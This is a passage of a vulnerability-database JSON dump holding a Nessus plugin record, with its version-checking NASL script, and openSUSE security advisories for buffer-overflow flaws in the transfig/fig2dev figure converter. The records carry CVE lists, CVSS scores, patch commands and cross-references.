7}, {"bulletin": {"id": "DEBIAN_DLA-2073.NASL", "hash": "d37bbfb7cd332909cbb7be296459930e", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to write prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2020-01-22T00:00:00", "modified": "2021-01-11T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "https://packages.debian.org/source/jessie/transfig", "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16140", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555"], "cvelist": ["CVE-2018-16140", "CVE-2019-14275", "CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-08-07T16:06:47", "history": [], "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2019-14275", "UB:CVE-2019-19555", "UB:CVE-2018-16140"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-16140", "RH:CVE-2019-19555", "RH:CVE-2019-14275"]}, {"type": "cve", "idList": ["CVE-2019-19555", "CVE-2019-14275", "CVE-2018-16140"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"]}, {"type": "nessus", "idList": ["OPENSUSE-2019-1455.NASL", "SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2021-1143.NASL", "UBUNTU_USN-3760-1.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2020-1702.NASL", "OPENSUSE-2021-2454.NASL", "OPENSUSE-2020-1843.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2021:1143-1", "OPENSUSE-SU-2019:1455-1"]}, {"type": "ubuntu", "idList": ["USN-3760-1"]}], "modified": "2021-08-07T16:06:47", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-07T16:06:47", "rev": 2}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["p-cpe:/a:debian:debian_linux:transfig", "cpe:/o:debian:debian_linux:8.0"], "solution": "Upgrade the affected transfig package.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-01-21T00:00:00", "vulnerabilityPublicationDate": "2018-08-30T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-07T16:06:47", "differentElements": ["nessusSeverity"], "edition": 8}], "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2018-16140", "RH:CVE-2019-14275"]}, {"type": "cve", "idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-16140", "UB:CVE-2019-19555", "UB:CVE-2019-14275"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310852517", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310892073"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-1702.NASL", "SUSE_SU-2021-2454-1.NASL", "UBUNTU_USN-3760-1.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2019-1455.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-1143.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2020-1806-1.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1143-1", "OPENSUSE-SU-2021:2454-1"]}, {"type": "ubuntu", "idList": ["USN-3760-1"]}], "modified": "2021-08-19T12:17:14", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-19T12:17:14", "rev": 2}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["p-cpe:/a:debian:debian_linux:transfig", "cpe:/o:debian:debian_linux:8.0"], "solution": "Upgrade the affected transfig package.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-01-21T00:00:00", "vulnerabilityPublicationDate": "2018-08-30T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}], "suse": [{"id": "OPENSUSE-SU-2021:1318-1", "hash": "25020ddb6c3931ad4f343d01dce96b8e", "type": "suse", "bulletinFamily": "unix", "title": "Security update for transfig (moderate)", "description": "An update that fixes 5 vulnerabilities is now available.\n\nDescription:\n\n This update for transfig fixes the following issues:\n\n Update to version 3.2.8, including fixes for\n\n - CVE-2021-3561: overflow in fig2dev/read.c in function read_colordef()\n (bsc#1186329).\n - CVE-2019-19797: out-of-bounds write in read_colordef in read.c\n (bsc#1159293).\n - CVE-2019-19555: stack-based buffer overflow because of an incorrect\n sscanf (bsc#1161698).\n - CVE-2019-19746: segmentation fault and out-of-bounds write because of an\n integer overflow via a large arrow type (bsc#1159130).\n - CVE-2019-14275: stack-based buffer overflow in the calc_arrow function\n in bound.c (bsc#1143650).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP3:\n\n zypper in -t patch openSUSE-2021-1318=1", "published": "2021-09-28T17:21:33", "modified": "2021-09-28T17:21:33", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4HYGTSDI2IQ34SYGQZGBYMH3NPMCAL2X/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-10-24T12:26:22", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "FEDORA_2020-6A2824178E.NASL", "DEBIAN_DLA-2778.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2021-1682.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2020-1806-1.NASL", "SUSE_SU-2021-14823-1.NASL", "OPENSUSE-2021-1143.NASL", "AL2_ALAS-2020-1398.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2020-1702.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19746", "UB:CVE-2019-19797", "UB:CVE-2019-19555", "UB:CVE-2019-14275"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-14275", "RH:CVE-2021-3561", "RH:CVE-2019-19797", "RH:CVE-2019-19746", "RH:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19555", "CVE-2019-19746"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877368", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877387"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:983DF624CFF6", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:9C4BF3072F18", "FEDORA:E540F6253477"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-10-23T02:26:15", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-10-23T02:26:15", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Backports SLE", "OSVersion": "15-SP3", "arch": "aarch64", "operator": "lt", "packageVersion": "3.2.8a-bp153.3.3.2", "packageFilename": "transfig-3.2.8a-bp153.3.3.2.aarch64.rpm", "packageName": "transfig"}, {"OS": "openSUSE Backports SLE", "OSVersion": "15-SP3", "arch": "i586", "operator": "lt", "packageVersion": "3.2.8a-bp153.3.3.2", "packageFilename": "transfig-3.2.8a-bp153.3.3.2.i586.rpm", "packageName": "transfig"}, {"OS": "openSUSE Backports SLE", "OSVersion": "15-SP3", "arch": "ppc64le", "operator": "lt", "packageVersion": "3.2.8a-bp153.3.3.2", "packageFilename": "transfig-3.2.8a-bp153.3.3.2.ppc64le.rpm", "packageName": "transfig"}, {"OS": "openSUSE Backports SLE", "OSVersion": "15-SP3", "arch": "s390x", "operator": "lt", "packageVersion": "3.2.8a-bp153.3.3.2", "packageFilename": "transfig-3.2.8a-bp153.3.3.2.s390x.rpm", "packageName": "transfig"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.suse.SuseBulletin", "robots.models.base.Bulletin"]}, {"id": "OPENSUSE-SU-2021:1311-1", "hash": "ae77d3159030db5547e4946141a5cf3b", "type": "suse", "bulletinFamily": "unix", "title": "Security update for transfig (moderate)", "description": "An update that fixes 5 vulnerabilities is now available.\n\nDescription:\n\n This update for transfig fixes the following issues:\n\n Update to version 3.2.8, including fixes for\n\n - CVE-2021-3561: overflow in fig2dev/read.c in function read_colordef()\n (bsc#1186329).\n - CVE-2019-19797: out-of-bounds write in read_colordef in read.c\n (bsc#1159293).\n - CVE-2019-19555: stack-based buffer overflow because of an incorrect\n sscanf (bsc#1161698).\n - CVE-2019-19746: segmentation fault and out-of-bounds write because of an\n integer overflow via a large arrow type (bsc#1159130).\n - CVE-2019-14275: stack-based buffer overflow in the calc_arrow function\n in bound.c (bsc#1143650).\n\n This update was imported from the SUSE:SLE-15:Update update project. This\n update was imported from the openSUSE:Leap:15.2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2021-1311=1", "published": "2021-09-27T20:16:40", "modified": "2021-09-27T20:16:40", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/PQ34JCCBYY5MVDLL7VGCWBOZKOQ5EXTK/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-10-24T12:26:22", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "FEDORA_2020-6A2824178E.NASL", "DEBIAN_DLA-2778.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2021-1682.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2020-1806-1.NASL", "SUSE_SU-2021-14823-1.NASL", "OPENSUSE-2021-1143.NASL", "AL2_ALAS-2020-1398.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2020-1702.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19746", "UB:CVE-2019-19797", "UB:CVE-2019-19555", "UB:CVE-2019-14275"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-14275", "RH:CVE-2021-3561", "RH:CVE-2019-19797", "RH:CVE-2019-19746", "RH:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19555", "CVE-2019-19746"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877368", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877387"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:983DF624CFF6", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:9C4BF3072F18", "FEDORA:E540F6253477"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-10-23T02:26:15", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-10-23T02:26:15", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Backports SLE", "OSVersion": "15-SP2", "arch": "aarch64", "operator": "lt", "packageVersion": "3.2.8a-bp152.3.3.2", "packageFilename": "transfig-3.2.8a-bp152.3.3.2.aarch64.rpm", "packageName": "transfig"}, {"OS": "openSUSE Backports SLE", "OSVersion": "15-SP2", "arch": "ppc64le", "operator": "lt", "packageVersion": "3.2.8a-bp152.3.3.2", "packageFilename": "transfig-3.2.8a-bp152.3.3.2.ppc64le.rpm", "packageName": "transfig"}, {"OS": "openSUSE Backports SLE", "OSVersion": "15-SP2", "arch": "s390x", "operator": "lt", "packageVersion": "3.2.8a-bp152.3.3.2", "packageFilename": "transfig-3.2.8a-bp152.3.3.2.s390x.rpm", "packageName": "transfig"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.suse.SuseBulletin", "robots.models.base.Bulletin"]}, {"id": "OPENSUSE-SU-2021:1143-1", "hash": "5ba1b418764b7704a704c8fc54d7a854", "type": "suse", "bulletinFamily": "unix", "title": "Security update for transfig (moderate)", "description": "An update that fixes 5 vulnerabilities is now available.\n\nDescription:\n\n This update for transfig fixes the following issues:\n\n Update to version 3.2.8, including fixes for\n\n - CVE-2021-3561: overflow in fig2dev/read.c in function read_colordef()\n (bsc#1186329).\n - CVE-2019-19797: out-of-bounds write in read_colordef in read.c\n (bsc#1159293).\n - CVE-2019-19555: stack-based buffer overflow because of an incorrect\n sscanf (bsc#1161698).\n - CVE-2019-19746: segmentation fault and out-of-bounds write because of an\n integer overflow via a large arrow type (bsc#1159130).\n - CVE-2019-14275: stack-based buffer overflow in the calc_arrow function\n in bound.c (bsc#1143650).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-1143=1", "published": "2021-08-10T22:26:40", "modified": "2021-08-10T22:26:40", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/LKD7IBCZKGMDHLZ7H4T5P7WTXHNFSOB6/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-10-24T14:26:30", "history": [], "viewCount": 84, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "FEDORA_2020-6A2824178E.NASL", "DEBIAN_DLA-2778.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2021-1682.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2020-1806-1.NASL", "SUSE_SU-2021-14823-1.NASL", "OPENSUSE-2021-1143.NASL", "AL2_ALAS-2020-1398.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2020-1702.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1843-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19746", "UB:CVE-2019-19797", "UB:CVE-2019-19555", "UB:CVE-2019-14275"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-14275", "RH:CVE-2021-3561", "RH:CVE-2019-19797", "RH:CVE-2019-19746", "RH:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19555", "CVE-2019-19746"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "openvas", "idList": 